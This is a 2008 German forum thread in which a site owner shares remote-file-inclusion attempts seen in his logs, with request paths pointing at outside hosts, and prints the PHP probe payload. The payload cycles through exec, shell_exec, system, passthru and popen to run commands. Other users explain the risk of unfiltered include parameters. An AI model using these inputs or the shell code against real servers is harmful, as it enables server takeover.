php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > IT-Security Forum > IT-Security
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


IT-Security Alles rund um IT-Security aus den Bereichen Hard- und Software

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 01-07-2008, 23:44
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard Hacker ?!

schaut euch mal diese referer an.
Da will doch jemand meinen Server übernehmen!

/index.php?prefix=http://www.vanderjagt-kraanverhuur.nl/id.txt?
/errors.php?error=http://fuckyou.fileave.com/alb.txt??
Mit Zitat antworten
  #2 (permalink)  
Alt 01-07-2008, 23:48
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Und jetzt?
Mit Zitat antworten
  #3 (permalink)  
Alt 02-07-2008, 00:17
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

nix!

ich finde es nur sehr spannend
Mit Zitat antworten
  #4 (permalink)  
Alt 02-07-2008, 00:22
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Ich finds eher gähnend langweilig. Hat er denn wenigstens Erfolg gehabt. Dann kann man dich wenigstens darauf hinweisen, deine Lücken zu stopfen, statt uns hier mit deinen Trivialitäten zu nerven.
Mit Zitat antworten
  #5 (permalink)  
Alt 02-07-2008, 10:50
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

tut mir leid









Ich finde es trotzdem spannend
Mit Zitat antworten
  #6 (permalink)  
Alt 02-07-2008, 11:05
UzumakiNaruto
 Registrierter Benutzer
Links : Onlinestatus : UzumakiNaruto ist offline
Registriert seit: Nov 2004
Beiträge: 642
UzumakiNaruto befindet sich auf einem aufstrebenden Ast
Standard

ich würde mal eher behaupten dort will jemand links in deine datenbank schreiben
__________________
Gruß
Uzu

private Homepage
Mit Zitat antworten
  #7 (permalink)  
Alt 02-07-2008, 11:44
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Der will Befehle auf dem Server ausführen

PHP-Code:
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo 
$eseguicmd;
function 
ex($cfe){
$res '';
if (!empty(
$cfe)){
if(
function_exists('exec')){
@
exec($cfe,$res);
$res join("\n",$res);
}
elseif(
function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(
function_exists('system')){
@
ob_start();
@
system($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(
function_exists('passthru')){
@
ob_start();
@
passthru($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(@
is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@
feof($f)) { $res .= @fread($f,1024); }
@
pclose($f);
}}
return 
$res;
}
exit; 
Mit Zitat antworten
  #8 (permalink)  
Alt 02-07-2008, 14:33
Flip7
 Registrierter Benutzer
Links : Onlinestatus : Flip7 ist offline
Registriert seit: May 2007
Ort: Munich
Beiträge: 126
Flip7 ist zur Zeit noch ein unbeschriebenes Blatt
Flip7 eine Nachricht über ICQ schicken
Standard

Auf http://fuckyou.fileave.com/ würden Spamer schöne Adressen finden :-D

und die niederländische Seite da verkauft oder vermietet Bagger :-D

komische Leute, aber @dunixphp JA das sind Hackerangriffe, jedoch irgendwie harmlose...

Ist aber ganz lustig alles zu überwachen, gell
__________________
Find Parties?
Partysuche
Mit Zitat antworten
  #9 (permalink)  
Alt 02-07-2008, 16:51
Benutzerbild von onemorenerd onemorenerd
  Moderator
Links : Onlinestatus : onemorenerd ist offline
Registriert seit: Mar 2005
Ort: Berlin
Beiträge: 9.471
onemorenerd wird schon bald berühmt werdenonemorenerd wird schon bald berühmt werden
Standard

Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.
Mit Zitat antworten
  #10 (permalink)  
Alt 02-07-2008, 17:10
h3ll
 Registrierter Benutzer
Links : Onlinestatus : h3ll ist offline
Registriert seit: Mar 2008
Beiträge: 3.608
h3ll befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Original geschrieben von onemorenerd
Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.
Was meiner Meinung nach genauso fahrlässig ist wie ein Auto mit geöffneten Fenstern abzustellen und darin den Zündschlüssel stecken zu lassen.
Mit Zitat antworten
  #11 (permalink)  
Alt 02-07-2008, 17:17
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Wobei in dem Fall nur der Besitzer des Autos den Schaden hat. Unter einer gekaperten Kiste leiden im Zweifelsfall wesentlich mehr Menschen.
Mit Zitat antworten
  #12 (permalink)  
Alt 02-07-2008, 19:13
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

harmlos mit Sicherheit nicht!
*Lehrgeld bereits bezahlt*
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

Die RIGID-FLEX-Technologie
Die RIGID-FLEX-TechnologieDie sogenannte "Flexible Elektronik" , oftmals auch als "Flexible Schaltungen" bezeichnet, ist eine zeitgemäße Technologie zum Montieren von elektronischen Schaltungen.

06.12.2018 | Berni

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni


 

Aktuelle PHP Scripte

ModuleStudio ansehen ModuleStudio

Modellgetriebene Entwicklung von Erweiterungen für das Open Source Framework Zikula.

15.01.2019 Guite | Kategorie: PHP ENTWICKLUNGSUMGEBUNG
FAQ Script PHP ansehen FAQ Script PHP

FAQ Script PHP is a simple knowledgebase script and you could use it as a Frequently Asked Question section on your website. It is written in PHP and MySQL.

14.01.2019 nevenov | Kategorie: PHP/ FAQ
Admidio Mitgliederverwaltung

Admidio ist eine kostenlose Online-Mitgliederverwaltung, die für Vereine, Gruppen und Organisationen optimiert ist. Sie besteht neben der Mitgliederverwaltung aus einer Vielzahl an Modulen (Foto-, Download-, Terminverwaltung), die in eine neue oder besteh

08.01.2019 webmaster52@ | Kategorie: PHP/ Groupware
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 05:59 Uhr.